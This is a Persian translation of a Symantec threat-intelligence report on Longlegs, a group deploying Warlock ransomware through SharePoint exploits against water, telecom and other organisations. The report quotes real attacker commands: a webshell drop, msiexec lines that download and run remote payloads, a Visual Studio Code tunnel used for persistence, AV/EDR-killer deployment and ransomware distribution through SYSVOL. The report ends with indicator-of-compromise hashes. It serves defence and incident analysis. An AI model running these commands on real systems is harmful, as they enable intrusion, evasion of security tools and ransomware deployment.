Symantec Threat Intelligence Warlock Ransomware Attackers Hit Water and Telecom Operators

سوءاستفاده Warlock از SharePoint برای حمله به شرکت‌های آب و مخابرات

یافته‌های کلیدی

  • Warlock نخست با سوءاستفاده از زنجیره بهره‌برداری «ToolShell» در Microsoft SharePoint مطرح شد.
  • Warlock توسط یک تهدیدگر وابسته به چین که Symantec آن را Longlegs (ملقب به ⁦Storm-2603⁩) می‌نامد توسعه داده می‌شود. Symantec پیش‌تر این گروه را به خوشه‌های فعالیت قدیمی‌تر با نام‌های ⁦CL-CRI-1040⁩، CamoFei و ChamelGang پیوند داده است.
  • در دو ماه گذشته، Longlegs دست‌کم به 4 سازمان حمله کرده است؛ شامل 2 اپراتور زیرساخت حیاتی (یک شرکت خدمات آب و یک اپراتور مخابراتی)، یک نهاد دولتی منطقه‌ای و یک دانشگاه. قربانیان در کشورهای پرتغالی‌زبان و اسپانیایی‌زبان در اروپا، آفریقا و آمریکای لاتین قرار داشتند.
  • این گروه همچنان آسیب‌پذیری‌های مرتبط با SharePoint را برای کسب دسترسی اولیه به سازمان‌های هدف ترجیح می‌دهد.
  • Longlegs از یک درایور امضاشده و آسیب‌پذیر (K7RKScan) سوءاستفاده می‌کند تا پیش از استقرار باج‌افزار، نرم‌افزارهای امنیتی را غیرفعال کند؛ همچنین مشاهده شده است که از قابلیت tunneling در Visual Studio Code برای دسترسی راه‌دور مخفیانه بهره می‌برد.

گروه وابسته به چینِ پشت باج‌افزار Warlock همچنان از طریق آسیب‌پذیری‌های Microsoft SharePoint به سازمان‌ها نفوذ می‌کند؛ تاکتیکی که یک سال قبل موجب مطرح‌شدن آن شده بود. در دو ماه گذشته، این گروه که Symantec آن را Longlegs (ملقب به ⁦Storm-2603⁩) رصد می‌کند، دست‌کم چهار سازمان را در کشورهای پرتغالی‌زبان و اسپانیایی‌زبان در اروپا، آفریقا و آمریکای لاتین هدف قرار داده است. قربانیان شامل دو اپراتور زیرساخت حیاتی، یعنی یک شرکت خدمات آب و یک اپراتور مخابراتی، به‌همراه یک نهاد دولتی منطقه‌ای و یک دانشگاه بوده‌اند.

Warlock در ژوئن 2025 پدیدار شد و چند هفته بعد زمانی خبرساز شد که مشخص گردید مهاجمانِ به‌کارگیرنده آن از آسیب‌پذیری‌های روز صفر در Microsoft SharePoint Server با نام «ToolShell» (با نام «ToolShell»، ⁦CVE-2025-49704⁩، ⁦CVE-2025-49706⁩، ⁦CVE-2025-53770⁩ و ⁦CVE-2025-53771⁩) سوءاستفاده می‌کنند. این نقص‌ها به‌احتمال زیاد همچنان در زرادخانه این گروه باقی مانده‌اند، در کنار نقص‌های جدیدتر SharePoint که آژانس U.S. Cybersecurity and Infrastructure Security Agency (CISA) در یک هشدار منتشرشده در ژوئیه 2026 درباره آن‌ها اخطار داده بود.

در یک نفوذ علیه یک بهره‌بردار زیرساخت حیاتی، مهاجمان ظرف حدود 2 ساعت ابزاری را که برای غیرفعال‌سازی نرم‌افزارهای امنیتی طراحی شده بود به دست‌کم 40 میزبان توزیع کردند. سپس با قرار دادن Warlock در اشتراک SYSVOL دامنه، آن را روی دست‌کم 33 میزبان مستقر کردند؛ تکثیر معمول دامنه این فایل را به ماشین‌ها رساند.

هدف‌گیری

تمرکز قربانیان اخیر در کشورهای پرتغالی‌زبان و اسپانیایی‌زبان قابل توجه است. فعالیت باج‌افزار Warlock پیش‌تر علیه سازمان‌هایی در دامنه گسترده‌تری از کشورها مشاهده شده است؛ از جمله ایالات متحده، برزیل، هند، روسیه، تایوان و ژاپن.

دسترسی اولیه از طریق سوءاستفاده از SharePoint

گروه Longlegs معمولاً با سوءاستفاده از چندین آسیب‌پذیری در استقرارهای on-premises محصول Microsoft SharePoint Server به دسترسی اولیه می‌رسد. پس از ورود، این گروه یک وب‌شل را در دایرکتوری LAYOUTS در SharePoint قرار می‌دهد و آن را هم‌زمان برای چند نسخه SharePoint مستقر می‌کند تا مستقل از نسخه‌ای که واقعاً نصب است کار کند. وظیفه وب‌شل استخراج ASP.NET machine keys مزرعه SharePoint است. مهاجمان سپس با استفاده از این کلیدها یک payload دارای امضای معتبر جعل می‌کنند تا اجرای کد از راه دور را درون SharePoint application pool به‌دست آورند.

دورزدن دفاع و DLL sideloading

این گروه برای بارگذاری کد مخرب در حافظه از DLL sideloading استفاده می‌کند و payloadهای پسین را از سرویس‌های مشروع اشتراک‌گذاری و ذخیره‌سازی فایل ابری مانند catbox[.]moe و wasabisys[.]com دانلود می‌کند تا فعالیت‌های شبکه‌ای خود را در ترافیک عادی پنهان کند و از شناسایی بگریزد. برای غیرفعال‌سازی نرم‌افزارهای امنیتی پیش از استقرار باج‌افزار، گروه Longlegs از K7RKScan سوءاستفاده می‌کند؛ درایوری امضاشده اما آسیب‌پذیر (⁦CVE-2025-1055⁩) که می‌توان از آن برای خاتمه دادن به فرایندهای حفاظت‌شده امنیتی در سطح هسته استفاده کرد. این رویکرد نمونه روشنی از تکنیک bring-your-own-vulnerable-driver (BYOVD) است.

استفاده از ابزارهای بومی سیستم و دسترسی راه دور پنهان

گروه Longlegs به‌صورت گسترده از ابزارهای بومی سیستم برای شناسایی و اجرای فرمان روی میزبان‌های به‌خطر‌افتاده استفاده می‌کند. همچنین مشاهده شده است که این گروه از قابلیت tunnel داخلی در Visual Studio Code سوءاستفاده می‌کند؛ باینری code-insiders.exe را به‌صورت یک سرویس نصب می‌کند تا دسترسی راه دور پنهانی بر بستر شبکه برقرار کند؛ دسترسی‌ای که در ترافیکی که معمولاً از ایستگاه‌های کاری توسعه‌دهندگان یا مدیران سرچشمه می‌گیرد ادغام می‌شود.

استقرار باج‌افزار از طریق SYSVOL

برای استقرار گسترده باج‌افزار، گروه Longlegs بار مخرب خود را در اشتراک SYSVOL دامنه‌ای که به مخاطره افتاده است قرار می‌دهد؛ مکانی که به‌صورت خودکار به همه کنترلرهای دامنه تکثیر می‌شود و در سطح دامنه قابل خواندن است. این روش به این گروه امکان می‌دهد باج‌افزار را برای اجرا به‌طور هم‌زمان روی تعداد زیادی از ماشین‌های شبکه قربانی توزیع کند، به‌جای آنکه هر بار تنها یک میزبان را هدف بگیرند.

زنجیره حمله: نفوذ به یک سازمان زیرساخت حیاتی

در کارزارهای اخیر، بردار اولیه آلودگی احتمالاً بهره‌برداری از آسیب‌پذیری‌ها در Microsoft SharePoint Server بوده است. نخستین فعالیت مخرب مشاهده‌شده در 22 ژوئیه 2026 رخ داد؛ زمانی که یک وب‌شل روی سرور SharePoint (Computer 1) نصب شد:

powershell -nop -c "[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMON\microsoft shared\web server extensions\14\template\layouts\layout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"

فعالیت مخرب در 24 ژوئیه از سر گرفته شد؛ زمانی که چند فرمان شناسایی (net user /domain و whoami) روی میزبان دوم SharePoint (Computer 2) اجرا شد.

در ادامه همان روز، مهاجمان تعدادی فایل با نام‌های عددی را از پروفایل Public و پوشه‌های ProgramData روی هر دو سیستم Computer 1 و Computer 2 حذف کردند؛ از جمله فایلی به نام doexeloc.dll. ظاهراً هدف، پاک‌سازی آثار مرحله‌بندی اولیه بود.

اندکی بعد، مهاجمان دو فایل اجرایی با نام‌های ssvagent.exe و logger.exe را در یک زیرفهرست از پوشه سیستمی Windows با مسیر CSIDL_SYSTEM\0409\ روی Computer 2 مستقر کردند و سپس آن‌ها را به ProgramData کپی کردند. به نظر می‌رسید این اجرایی‌ها برای بارگذاری جانبی DLL به‌کار می‌رفتند، زیرا دو DLL نیز همراه‌شان قرار داده شد (gsdll64.dll.tmp و doexeloc.dll.tmp). تقریباً هم‌زمان، پردازه worker مربوط به SharePoint روی Computer 1 یک جفت دیگر برای بارگذاری جانبی ایجاد کرد: doexe.exe در کنار یک فایل DLL دیگر به نام doexeloc.dll. در همان مقطع، مهاجمان فرمان nltest /domain_trusts را برای فهرست‌کردن روابط اعتماد دامنه در Active Directory قربانی اجرا کردند.

"CSIDL_SYSTEM\nltest.exe" /domain_trusts 

سه روز بعد، در 27 ژوئیه، روی Computer 2 یک درخواست وب خروجی به یک زیردامنه از oastify.com ارسال شد؛ این دامنه را سرویس شناسایی آسیب‌پذیری Burp Collaborator برای آزمون تعامل خارج از باند به کار می‌برد:

powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://www.[TARGET_DOMAIN].{RANDOM].oastify[.]com'

نام دامنه خودِ هدف در زیردامنه Burp Collaborator گنجانده شده بود. این با رفتار یک ابزار اسکن سازگار است که برای هر هدف یک URL قناری مجزا ایجاد می‌کند تا تأیید کند یک میزبان مشخص کد تزریق‌شده را با موفقیت اجرا کرده است، نه با هیچ کاربری تجاری مشروع.

صبح 28 ژوئیه مهاجمان به Computer 2 بازگشتند تا وب‌شل را دوباره بیازمایند. زنجیره اکسپلویت اصلی از بعدازظهر همان روز آغاز شد. روی Computer 1 دستور PowerShell کدگذاری‌شده با base64 زیر اجرا شد که با فواصل زمانی منظم تکرار می‌شد:

"CSIDL_SYSTEM\cmd.exe" /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=')

این دستور یک assembly را بارگذاری می‌کند که انواع نمایان‌شدهٔ آن گجت سریال‌زدایی لازم را برای تبدیل یک payload __VIEWSTATE جعلی و با machine-key امضا‌شده به اجرای کد دلخواه درون application pool مربوط به SharePoint فراهم می‌کند. همین توالی در بعدازظهر همان روز روی Computer 2 نیز دو بار اجرا شد.

پس از برقرار شدن اجرای کد، مهاجمان به سراغ دریافت payloadهای بعدی رفتند. روی Computer 2 فرایند msiexec به‌صورت پیاپی در برابر دو URL مجزا اجرا شد و 80 دقیقه بعد یک بستهٔ دیگر با نامی متفاوت نیز اجرا شد:

msiexec.exe /q /i "https://litter.catbox[.]moe/6f5tdt.msi" msiexec.exe /q /i "https://s3.wasabisys[.]com/fortifs/vamd64.msi" msiexec /q /i https://xn8xyt-drop.s3.wasabisys[.]com/xn8xyt.msi

اتکا به دو سرویس میزبانی عمومی متفاوت و سه نام بستهٔ متمایز در بازه‌ای کمتر از 90 دقیقه نشان می‌دهد مهاجمان بیش از یک payload آمادهٔ اجرا داشتند و به یک نقطهٔ تحویل واحد متکی نبودند.

در ادامه نفوذ از دو سرور اولیهٔ SharePoint فراتر رفت و دامنهٔ وسیع‌تری را دربر گرفت. در ادامهٔ همان روز و تا روز بعد (29 ژوئیه)، مهاجمان بارها یک حساب دامنه با نام SPSEPRDSetup را به گروه محلی Administrators روی سه میزبان دیگر (Computer 3، Computer 4 و Computer 5) افزودند:

net localgroup administrators SPSEPRDSetup /add 

نام حساب به احتمال زیاد تلاشی برای جعل هویت است. در SharePoint معمولاً حساب‌های سرویس با نام‌هایی ایجاد می‌شوند که از الگوی دارای پیشوند SPS/SP پیروی می‌کنند.

روی Computer 4، مهاجمان سازوکاری متفاوت برای ماندگاری و دسترسی راه دور نصب کردند. به‌جای استفاده از یک ابزار اختصاصی دسترسی راه دور، از قابلیت tunnel داخلی Visual Studio Code بهره گرفتند:

"CSIDL_WINDOWS\debug\code-insiders.exe" tunnel service install --accept-server-license-terms

به دلیل اینکه فایل اجرایی VS Code Insiders توسط Microsoft امضا شده است و تونل از زیرساخت خود Microsoft عبور می‌کند، این رویکرد می‌تواند آسان‌تر در ترافیک خروجی‌ای که معمولاً از ایستگاه‌های کاری توسعه‌دهندگان یا مدیران IT انتظار می‌رود ادغام شود.

ساعاتی بعد در همان شب، روی Computer 2 ابزار NetExec (nxc.exe) اجرا شد؛ جانشین متن‌باز و فعالاً نگه‌داری‌شده چارچوب تست نفوذ CrackMapExec. از آن برای شمارش Active Directory، credential spraying و اجرای فرمان از راه دور استفاده شد؛ که نشان می‌دهد مهاجمان در حال نقشه‌برداری از دامنه بزرگ‌تر و حرکت درون آن بودند.

در بازه 30 ژوئیه تا ساعات اولیه 31 ژوئیه، تنها فعالیت ثبت‌شده، ظاهر شدن دوباره جفت doexeloc.dll/doexe.exe به‌صورت side-loading روی Computer 1 بود. این رفتار با تداوم اجرای یک مؤلفه side-loaded در پس‌زمینه هم‌خوانی دارد.

نفوذ در ساعات اولیه 31 ژوئیه وارد فاز نهایی شد. مهاجمان ابزار a.exe را برای از کار انداختن AV/EDR، که احتمالاً از یک درایور آسیب‌پذیر بهره می‌گرفت، با سرعت و به‌صورت متوالی به چندین میزبان ارسال کردند. این کار با یک الگوی تک‌خطی ثابت انجام شد که یک share شبکه میزبانی‌شده روی یک IP داخلی را به‌عنوان درایو شبکه‌ای متصل می‌کرد، مجموعه ابزار محلی را از آن کپی می‌کرد و آن را اجرا می‌نمود:

" CSIDL_WINDOWS \cmd.exe" /c net use \\[IP_ADDRESS] [REMOVED] /user:[REMOVED] & copy \\[IP_ADDRESS]\av\* CSIDL_PROFILE\public /y & start /B cmd /c "c:\users\public\a.exe log 2>nul || exit"

هویت درایور آسیب‌پذیر نامعلوم مانده است، اما در حملات اخیر دیگر، این گروه از درایور آسیب‌پذیر K7RKScan استفاده کرده است. فرمانی مشابه روی Computer 4 و Computer 6 هم اجرا شد و ثبت اجرای AV/EDR Killer روی دست‌کم 40 میزبان دیگر طی حدود دو ساعت مشاهده شد؛ که نشان می‌دهد این ابزار تقریباً در سراسر محیط توزیع شده است، نه صرفاً روی چند ماشین هدفمند.

باج‌افزار Warlock تقریباً به‌محض آن‌که حفاظت روی هر میزبان غیرفعال شد، ظاهر شد. دو باینری run.exe و rune.exe به‌همراه یادداشت باج با عنوان “how to restore your files.txt” روی دست‌کم 33 میزبان در سراسر سازمان ثبت شدند.

"CSIDL_SYSTEM\cmd.exe" /c copy \\[REMOVED]\SYSVOL\[VICTIM DOMAIN]\scripts\run\* CSIDL_PROFILE\public /y & start /B cmd /c "c:\users\public\run.exe 2>nul || exit" & start /B cmd /c "c:\users\public\rune.exe 2>nul || exit"

قرار دادن payload در اشتراک SYSVOL دامنه ــ مکانی که به‌طور خودکار به همه کنترلرهای دامنه تکثیر می‌شود و در سطح دامنه قابل خواندن است ــ روشی شناخته‌شده برای توزیع payload به‌منظور اجرا توسط logon script یا Group Policy object در کل شبکه به‌صورت یک‌باره است، نه میزبان‌به‌میزبان.

داده‌های سه میزبان دیگر این سازوکار را در حین اجرا به‌طور مستقیم ثبت کردند. در این موارد، سرویس Distributed File System Replication (dfsrs.exe) ــ فرایندی که مسئول تکثیر SYSVOL میان کنترلرهای دامنه است ــ به‌عنوان فرایند والدِ تحویل‌دهنده run.exe و rune.exe از همان مسیر CSIDL_WINDOWS \ SYSVOL\domain\scripts\run ثبت شد. این امر تأیید می‌کند که payload از طریق تکثیر معمولی SYSVOL به آن میزبان‌ها رسیده است، نه با یک سازوکار push جداگانه.

اهمیت

تداوم فعالیت Longlegs، بیش از یک سال پس از آن‌که باج‌افزار Warlock برای نخستین بار مطرح شد، نشان می‌دهد بهره‌برداری از ToolShell و سایر آسیب‌پذیری‌های مرتبط با SharePoint همچنان یک مسیر دسترسی اولیه برای مهاجمان علیه استقرارهای SharePoint است که پچ نشده یا به‌نحو دیگری کاهش ریسک نیافته‌اند.

تمرکز اخیرِ مشهود بر کشورهای پرتغالی‌زبان و اسپانیایی‌زبان نشان می‌دهد یا با الگوی هدف‌گیری فرصت‌طلبانه و ناشی از در معرض بودن سرورهای SharePoint آسیب‌پذیر روبه‌رو هستیم، یا با مأموریتی سنجیده‌تر. حضور اپراتورهای زیرساخت حیاتی در میان قربانیان یادآور پیامدهای دنیای واقعیِ حملات باج‌افزاری است که علیه خدمات ضروری به موفقیت می‌رسند.

حفاظت

راهکار Symantec CBX به‌عنوان یک پلتفرم XDR یکپارچه، چندین لایه دفاعی در برابر چنین حملاتی فراهم می‌کند. قابلیت Adaptive Protection می‌تواند استفاده غیرمعمول از ابزارهای مشروع living-off-the-land (net، whoami، nltest) را به‌صورت خودکار علامت‌گذاری و مسدود کند. قابلیت Threat Tracer در CBX نمای یگانه‌ای از کل جریان کار مهاجم به تحلیلگران می‌دهد تا بتوانند جای پای اولیه را پیش از آن‌که به مرحله‌بندی SYSVOL در سطح دامنه ارتقا یابد، آسان‌تر شناسایی کنند. ویژگی Incident Prediction می‌تواند گام‌های بعدیِ محتملِ مهاجم را پیش‌بینی کند و AI Security Assistant نیز رفتار مشاهده‌شده را با الگوهای TTP شناخته‌شده باج‌افزار تطبیق می‌دهد تا تیم‌ها پیش از آن‌که Warlock در مقیاس گسترده مستقر شود، مداخله کنند. برای اطلاع بیشتر read our blog: Symantec CBX is Here.

اگر شاخص نفوذ (IOC) مخرب باشد و فایل نزد Symantec در دسترس باشد، محصولات Symantec Endpoint آن فایل را شناسایی و مسدود می‌کنند.

شاخص‌های نفوذ

شاخص‌های فایل

هش 116ca4e88a1bcebb6c0da7fb431c8eca7b8ef3f9767194820c56091972ccac2c - Warlock

هش 155fb1cbdaea12c83ba92d18c88cf38bbc42bb684f913ca0bc26fcf115426a55 - Warlock

هش 1edb2c0b537cd95bbd5fc16321b4c38a6adf325ccc7b588ad6acc980b0463b60 – DLL مخرب

هش 206f27ae820783b7755bca89f83a0fe096dbb510018dd65b63fc80bd20c03261 - DLL مخرب

هش 27b7591cf9e1283010ca98fa5dbe970a73fee0d8cde277639924c144718db7c0 - DLL مخرب

هش 37f94fe1b4a106f02b6f74a69cbc05e69c17406f688beef4c9a045ffcbd2e65e – فایل مشکوک

هش 6d07f1232dc59b84038fd0b2e75fdd3d5b825882bb0dba9e6724b7b0823fa3ad - Warlock

هش 73c5268256c9da5488cd9e2b79013060ac321c7e54129344dc7b51e268af36ea – AV/EDR Killer

هش 8b58f7811a2a2f2a5024220490473774f02759dd2dd904b5b9fabfbaae37125f - Warlock

هش 8ce8d8270ee9de02644530b8dd7fa78973b4a3b80f121e2c5f45ae68cce196f9 - Warlock

هش 9ceb01f8bf7d6dba2ae07f5bd6070de3ec67b5eb01f969b0ba85e74564fb83a7 – فایل مشکوک

هش aaff04d84ef85353966aa4af186ff1254b72c068f33f802417b29dc23fb9f192 - فایل مشکوک

هش ae9f7fce57c7b928e659dccf0e00fa79cd9cd61a106f18d4e03f92dc3a03c295 – درایور آسیب‌پذیر

هش c46825fcc0d1bf7a8b192facb176d6bf916c9dccfd6fa994be691e3b0e585f4e – DLL مخرب

هش e14240bac8277b0f6dd4d29ab5da20d246bcccae647e5fe8d19cdae7fe471b20 - DLL مخرب

هش e3204b05e2f3a29bb6e6fcc21dda77d7cd31dfa755c21da0aa8661b5619ee0a1 - فایل مشکوک

هش eea631b5f7125239db0811e4682c2316ead69f9822e02d94fb5d8bf0d2faebed – فایل مشکوک

هش f7269f80f81e99d06a590d7ab374e12fdf7e5f55a02c2a46c342d670f8519fdf - فایل مشکوک

هش fb3846c9ac53d1b841ada3a6b1091153fea41a169cb44fe0084097d1f4d45984 - DLL مخرب

مطالب مرتبط

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

انتخاب مسیریاب

برای مسیریابی یکی از اپلیکیشن های زیر را انتخاب کنید.